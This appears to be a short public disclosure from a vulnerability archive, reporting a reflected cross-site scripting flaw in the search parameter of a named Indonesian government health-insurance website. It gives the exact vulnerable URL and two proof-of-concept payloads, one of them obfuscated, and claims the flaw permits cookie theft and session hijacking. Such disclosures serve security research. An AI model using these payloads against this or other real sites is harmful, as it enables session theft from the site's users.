BPJS KESEHATAN XSS Vulnerable

2019.12.08

KHS1N Cyber 07 (JP)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#Nick name: KHS1N Cyber 07
#from     : Indonesia
#Youtube  : HCT Sec07
#contact  : kuliahdopermanent@gmail.com

Note :
The XSS bug also allows an attacker to go through a hijack session

This bug allows the attacker / hacker to do cookie stealing

Vulnerabilty : 
#XSS (cross site scripting)

domain & dir site vulnerable:

https://www.bpjs-kesehatan.go.id/bpjs/index.php/arsip/index/kat-28?keyword=

payload :
<script>alert(123)</script>

xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>

See this note in RAW Version

Vote for this issue:

100%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

BPJS KESEHATAN XSS Vulnerable

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

BPJS KESEHATAN XSS Vulnerable

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.